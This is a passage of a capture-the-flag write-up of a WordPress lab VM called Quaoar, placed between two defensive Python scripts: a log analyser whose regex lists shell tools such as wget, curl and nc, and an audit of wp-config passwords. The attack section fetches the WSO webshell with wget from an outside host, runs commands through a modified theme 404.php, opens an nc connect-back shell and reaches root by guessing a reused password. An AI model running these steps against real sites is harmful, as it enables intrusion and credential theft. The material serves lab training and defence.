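DIRECT_PHP = re.compile(r"/wp-content/(?:themes|uploads)/.*\.php$", re.I)
# Decoded parameter values that look like a shell command line (heuristic).
SHELL_HINT = re.compile(
    r"[;|`]|\$\(|\b(?:id|pwd|ls|cat|mv|wget|curl|nc|uname|whoami)\b")


def decode_query(query):
    """Split on '&' only and URL-decode, so ';' stays inside the value."""
    pairs = []
    for part in filter(None, query.split("&")):
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyze(log_text, xmlrpc_threshold=3):
    findings, xmlrpc_posts = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path.endswith("/xmlrpc.php"):
            xmlrpc_posts[m["ip"]] += 1
        if DIRECT_PHP.search(url.path):
            suspicious = {k: v for k, v in decode_query(url.query)
                          if SHELL_HINT.search(v)}
            findings.append({
                "rule": "webshell-command" if suspicious else "direct-theme-php",
                "ip": m["ip"], "path": url.path, "params": suspicious,
                "status": int(m["status"])})
    for ip, count in xmlrpc_posts.items():
        if count >= xmlrpc_threshold:
            findings.append({"rule": "xmlrpc-burst", "ip": ip, "count": count})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Because system.multicall packs many password guesses into one POST, the XML-RPC counter underestimates the number of attempts, so keep the threshold low or disable xmlrpc.php where it is not needed.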

Inject WSO Shell

Download

https://github.com/mIcHyAmRaNe/wso-webshell/blob/master/wso.php
https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt

Copy and paste to /home/kali/Downloads/wso.txt

Rename

cp wso.php wso.txt

Upload,

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=curl%20--data%20"@/home/kali/Downloads/wso.txt"%20<%20wso.txt
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20wso.txt
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv wso.txt wso.php


We use wget to upload the shell, but the shell must be in txt format.

localhost/cmd.php?cmd=wget http://files.xakep.biz/shells/PHP/wso.txt

Then rename wso.txt to wso.php:

localhost/cmd.php?cmd=mv wso.txt wso.php


Yep, it worked! Upload the WSO Shell; I assume you readers already know how to do that xD. Basically, use wget or curl to download the file.


WSO Shell, for those who want to look around.

Time for a connect-back shell: just run the command nc -lvp 31337 and open the network section. Enter your IP and you get a shell like this


Remember! Don't forget to run these 2 commands once the connect back has succeeded

$ python -c "import pty; pty.spawn('/bin/bash');"
$ export TERM=xterm

Privilege Escalation (getting common user)

Read the output of linuxprivchecker.py. There is something interesting about the kernel version:

[+] Kernel

   Linux version 3.2.0-23-generic-pae (buildd@palmer) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012

And when I wanted to compile and run the exploit, the thing I feared really happened

www-data@Quaoar:/var/www/wordpress/wp-content/themes/twentyfourteen$ gcc
The program 'gcc' can be found in the following packages:

  • gcc
  • pentium-builder

Ask your administrator to install one of them

Oh my god! But I did not give up; I searched https://www.kernel-exploits.com/kernel/?version=3.2.0 and found a matching exploit. However, when it was run


Even though chmod +x had already been applied beforehand.

Hmm, now let's re-read /etc/passwd from linuxprivchecker. There is a user wpadmin, like this

[+] All users

   root:x:0:0:root:/root:/bin/bash
   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
   bin:x:2:2:bin:/bin:/bin/sh
   sys:x:3:3:sys:/dev:/bin/sh
   sync:x:4:65534:sync:/bin:/bin/sync
   games:x:5:60:games:/usr/games:/bin/sh
   man:x:6:12:man:/var/cache/man:/bin/sh
   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
   mail:x:8:8:mail:/var/mail:/bin/sh
   news:x:9:9:news:/var/spool/news:/bin/sh
   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
   proxy:x:13:13:proxy:/bin:/bin/sh
   www-data:x:33:33:www-data:/var/www:/bin/sh
   backup:x:34:34:backup:/var/backups:/bin/sh
   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
   syslog:x:101:103::/home/syslog:/bin/false
   mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
   messagebus:x:103:107::/var/run/dbus:/bin/false
   whoopsie:x:105:112::/nonexistent:/bin/false

....

   wpadmin:x:1001:1001::/home/wpadmin:/bin/sh

For the WordPress admin account earlier, the username and password were identical. Does this also apply to the wpadmin user? Why don't we try


Whoa, it actually worked!!! XD XD

Anyway, I tried decrypting that md5 flag for fun and nothing was found. I tried using it for root, but it seems that is not the password.

Privilege Escalation (getting root)

I found no other way than brute force, but brute-forcing root would of course be a headache too, because /etc/shadow cannot be opened.

In the end I tried, on a whim, looking at the WordPress configuration; who knows, the root password might be the database server password

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');

Then I simply tried the password rootpassword! on root


Okay! It worked, we have made it this far, yay!!!
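
The weakness used in this last step is a database password that is built from an account name and reused for an OS login. The following Python audit of the wp-config.php settings shown above is an added example, not part of the original walkthrough; the sample inputs are constructed from the listings on this page, and the finding texts and the 16-character minimum are assumptions.

```python
import re

# Constructed input: the DB settings shown above plus one commented-out define.
SAMPLE_CONFIG = """<?php
// define('DB_PASSWORD', 'old-value');
/** MySQL database username */
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
"""
# Constructed subset of the /etc/passwd listing shown earlier on the page.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh
"""

# define('KEY', 'value') with either quote style and backslash escapes.
DEFINE_RE = re.compile(
    r"define\(\s*(['\"])(\w+)\1\s*,\s*(['\"])((?:\\.|(?!\3).)*)\3\s*\)")


def parse_defines(php_source):
    """Return {constant: value} for string define() calls outside comments."""
    text = re.sub(r"/\*.*?\*/", "", php_source, flags=re.S)
    lines = [ln for ln in text.splitlines()
             if not ln.lstrip().startswith(("//", "#"))]
    return {m.group(2): m.group(4)
            for m in DEFINE_RE.finditer("\n".join(lines))}


def login_accounts(passwd_text):
    """Account names whose shell is not nologin or false."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false")):
            names.append(fields[0])
    return names


def audit(php_source, passwd_text):
    cfg = parse_defines(php_source)
    user, pw = cfg.get("DB_USER", ""), cfg.get("DB_PASSWORD", "")
    findings = []
    if user == "root":
        findings.append("DB_USER is the MySQL superuser; use a per-site account")
    if user and user.lower() in pw.lower():
        findings.append("DB_PASSWORD contains the DB user name")
    for name in login_accounts(passwd_text):
        if name.lower() in pw.lower():
            findings.append(f"DB_PASSWORD contains OS login name '{name}'")
    if len(pw) < 16 or re.search(r"pass(word)?|admin|1234", pw, re.I):
        findings.append("DB_PASSWORD is short or built from dictionary words")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG, SAMPLE_PASSWD):
        print("[!]", finding)
```

The audit cannot see whether the same string is also set as an OS password; that check needs the hashes in /etc/shadow and has to be run by an administrator.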

Epilogue

Honestly, this VM is actually easy; the annoying part is that it is all about brute force and password guessing.

Of course, even though it is easy, it is still difficult for those of you who are new to the world of hacking. Password guessing is, I would say, one of the "god-tier skills", because you need a good sense for it.

That's all for now, stay tuned for other articles! :D

References